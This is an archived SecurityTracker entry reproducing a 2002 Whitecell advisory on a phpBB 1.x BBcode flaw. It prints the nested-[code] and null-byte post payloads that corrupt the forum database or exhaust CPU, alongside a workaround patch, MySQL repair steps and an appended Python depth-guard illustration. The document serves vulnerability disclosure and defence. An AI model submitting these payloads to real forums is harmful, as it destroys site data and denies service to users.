SecurityTracker.com
SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpBB
Vendors:   phpBB Group
phpBB Forum May Let Remote Users Corrupt the phpBB Database Using Malicious 'BBcode'
SecurityTracker Alert ID:  1003979
SecurityTracker URL:  http://securitytracker.com/id/1003979
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 4 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.0.0 - 1.4.4, possibly others
Description:   A vulnerability has been reported in phpBB. A remote user can create denial of service conditions and destroy phpBB databases.

Whitecell Security Systems has reported a vulnerability in the processing of nested 'BBcode' in the functions.php module. A remote user can post the following BBcode to cause the database to become corrupt:

[code]'\0'*800[/code]

A remote user can post the following BBcode to cause the system to consume nearly all available CPU resources:

[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]

Some information on how to fix a corrupt phpBB database is provided in the Source Message.

Impact:   A remote user may be able to corrupt the phpBB database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpbb.com/
Cause:   State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


(WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


Release information
-------------------

Release Date: 2001-4-4
Author:   By Whitecell Security Systems (WSS)
          tombkeeper (tombkeeper@whitecell.org)
          alert7     (alert7@whitecell.org)
Homepage: http://www.whitecell.org/


Impact: 
-------- 

WSS has found a vulnerability in PHPBB when PHPBB processes BBcode, which could
enable one user to DoS the system and destroy PHPBB databases.


Affected Versions
-----------------

	phpBB Group phpBB 1.4.4
	phpBB Group phpBB 1.4.2
	phpBB Group phpBB 1.4.1
	phpBB Group phpBB 1.4.0
	phpBB Group phpBB 1.2.1
	phpBB Group phpBB 1.2.0
	phpBB Group phpBB 1.0.0
----------------------------

NOT TESTED:
phpBB Group phpBB 2.x


Description:
------------

  phpBB supports nested BBcode: [code][/code], [quote][/quote], [list][/list].
Unfortunately, there is a mistake when processing BBcode in functions.php.


Exploit:
----------

Submit the following post:

[code]
\0\0\0\0\0\0\0
[/code]

In fact, the following data has been saved to the database after BBcode processing.

[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]

Submit the following post:
[code]'\0'*800[/code]

See the system:
whitecell$ top
PID  USER      PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND
8643 nobody    13   0   212M  81M 13604 D     8.0 65.7   0:07 httpd

phpbb error message:
Could not enter post text! 

But in fact, two records have already been saved to the database. Now the database
is incomplete. If you browse the forum to see what you posted, phpBB could
report the message: "Could not connect to the forums database."

Submit 49 bytes of data:

[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]

Type top to see the CPU usage:
  PID USER     PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND
25741 nobody    14   0 11828 9996   416 R    99.9  7.8   2:38 httpd



Vendor
--------

http://www.phpbb.com


Workaround: 
-----------

1: Disable BBcode until the vendor fixes it.
2: Modify bbencode_code() in functions.php:

function bbencode_code($message, $is_html_disabled)
{
	// Workaround: one non-greedy pass rewrites each [code]...[/code] pair exactly once;
	// inner [code] tags are left as literal text instead of being processed again.
	$message = preg_replace("/\[code\](.*?)\[\/code\]/si", "<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85><TR><TD><font size=-1>Code:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><PRE>\\1</PRE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode End -->", $message);
	return $message;
} // bbencode_code()

REPAIR DATABASE:
If the URL is http://host/forums/viewtopic.php?topic=1162&forum=1&0
you can use the following commands to repair it:
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select * from topics where topic_id = 1162; -- get post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete from topics where topic_id = 1162;


------------ 

WSS is a non-profit and free technology organization. We are devoted to
research and demonstration of weaknesses related to network services,
communication security and system security.


Copyright 2002 http://www.whitecell.org/  All rights reserved. 
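As an added illustration (not phpBB's or WSS's code), a Python model of the workaround's single non-greedy pass with a nesting-depth guard placed in front of it; the OPEN/CLOSE strings, the accept_post policy and its max_depth value are assumptions standing in for phpBB's table markup and a site policy. It runs on constructed copies of the advisory's two payloads and shows that the output size stays linear in the input size, with inner [code] tags left as literal text rather than expanded again.

```python
import re

# Added example (not phpBB's code): the single-pass transform from the advisory's
# workaround, with a nesting-depth guard in front of it. OPEN/CLOSE are hypothetical
# stand-ins for phpBB's table markup; HTML escaping of the body is out of scope here.
CODE_RE = re.compile(r"\[code\](.*?)\[/code\]", re.S | re.I)
OPEN, CLOSE = "<pre>", "</pre>"
TAG_LEN = len("[code]") + len("[/code]")  # 13 characters consumed per matched pair

def bbencode_code_single_pass(message: str) -> str:
    """Rewrite each [code]...[/code] pair exactly once, left to right.
    The non-greedy group stops at the first closer, so inner [code] tags
    stay as literal text and are never re-expanded."""
    return CODE_RE.sub(lambda m: OPEN + m.group(1) + CLOSE, message)

def expected_output_len(message: str) -> int:
    """Size bound for the single pass: the input length plus a fixed cost
    per matched pair, so no input can grow faster than linearly."""
    matches = len(CODE_RE.findall(message))
    return len(message) + matches * (len(OPEN) + len(CLOSE) - TAG_LEN)

def code_nesting_depth(message: str) -> int:
    """Deepest run of unmatched [code] openers (closers never go below 0)."""
    depth = deepest = 0
    for tag in re.finditer(r"\[(/?)code\]", message, re.I):
        depth = depth + 1 if tag.group(1) == "" else max(depth - 1, 0)
        deepest = max(deepest, depth)
    return deepest

def accept_post(message: str, max_depth: int = 1) -> bool:
    """Guard to run before the post touches the database: reject nesting deeper
    than max_depth (assumed policy; the advisory reports nested tags spinning the CPU)."""
    return code_nesting_depth(message) <= max_depth

# Constructed inputs mirroring the advisory's two payloads. The nested one uses the
# two literal characters backslash and zero, which gives the 49 bytes the advisory quotes.
PAYLOAD_800 = "[code]" + "\0" * 800 + "[/code]"
PAYLOAD_NESTED = r"[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]"

if __name__ == "__main__":
    for name, payload in (("800 nulls", PAYLOAD_800), ("nested", PAYLOAD_NESTED)):
        out = bbencode_code_single_pass(payload)
        print(name, len(payload), "->", len(out), "accepted:", accept_post(payload))
```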

 
 

